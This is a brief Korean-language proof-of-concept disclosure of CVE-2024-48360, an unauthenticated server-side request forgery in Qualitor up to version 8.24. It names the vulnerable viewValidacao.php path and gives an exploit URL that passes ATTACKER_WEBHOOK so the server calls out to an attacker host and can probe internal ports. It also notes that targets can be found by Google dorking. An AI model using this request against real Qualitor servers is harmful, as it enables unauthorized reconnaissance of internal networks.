
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 인증되지 않은 SSRF
Qualitor는 비즈니스 프로세스 관리 플랫폼으로, Google dorking만으로도 쉽게 식별할 수 있는 브라질의 다양한 기업에 존재하는 시스템입니다.
저희 팀은 내부 시스템/포트를 열거할 수 있는 SSRF에 취약한 애플리케이션의 취약점을 식별했습니다.
Qualitor v8.24는 /request/viewValidacao.php 구성 요소를 통해 SSRF(Server-Side Request Forgery)가 발생하는 것으로 확인되었습니다.
악용하려면 host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK에 요청을 보내면 취약한 서버로부터 요청을 받게 됩니다.

https://www.linkedin.com/in/xvinicius/